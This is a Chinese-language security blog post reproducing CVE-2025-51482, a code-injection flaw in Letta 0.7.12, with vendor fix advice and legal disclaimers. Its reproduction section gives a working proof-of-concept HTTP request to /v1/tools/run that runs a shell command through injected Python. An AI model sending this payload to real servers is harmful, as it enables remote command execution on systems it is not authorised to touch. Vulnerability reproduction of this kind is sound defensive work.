文章总结: Letta-ailetta0.7.12版本存在代码注入漏洞CVE-2025-51482,允许通过/v1/tools/run端点执行任意Python代码和系统命令。攻击者可通过构造恶意请求绕过沙箱限制执行系统命令。厂商已发布修复补丁,建议用户尽快升级至最新版本,补丁包括过滤危险模块、限制exec()函数访问范围和增强沙箱隔离机制。
综合评分: 91
文章分类: 漏洞分析,代码审计,渗透测试,漏洞预警,应用安全
【成功复现】Letta-ai letta代码注入漏洞(CVE-2025-51482)
原创
弥天安全实验室
弥天安全实验室
2025年8月4日 22:16
北京
#
网安引领时代,弥天点亮未来
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍
Letta-ai letta是Letta-ai开源的一个具有内存、推理和上下文管理的有状态代理框架。
Letta-ai letta 0.7.12版本存在安全漏洞,该漏洞源于/v1/tools/run端点允许执行任意Python代码和系统命令,绕过沙箱限制。
0x02影响版本
Letta-ai letta 0.7.12版本
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC
漏洞复现
POST /v1/tools/run HTTP/1.1Host: 127.0.0.1Content-Type: application/jsonContent-Length: 223{ "source_code": "def test():\n \"\"\"Test rce.\"\"\"\n import os\n return os.popen('id').read()", "args": {}, "env_vars": { "PYTHONPATH": "/usr/lib/python3/dist-packages" }, "name": "test"}
通过id执行回显判断漏洞存在
3.nuclei工具测试
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
目前,Letta官方已通过PR #2630 修复了该漏洞,核心修复措施包括:
1、对用户提交的代码进行严格过滤,禁止导入os、subprocess等危险模块;
2、限制exec()函数的全局变量访问范围,仅允许调用白名单内的安全模块;
3、增强沙箱隔离机制,通过权限控制限制代码对系统资源的访问。
建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!
https://github.com/letta-ai/letta/releases
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
予以风动,
必降弥天之润!
弥 天
安全实验室
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:弥天安全实验室 弥天安全实验室《【成功复现】Letta-ai letta代码注入漏洞(CVE-2025-51482)》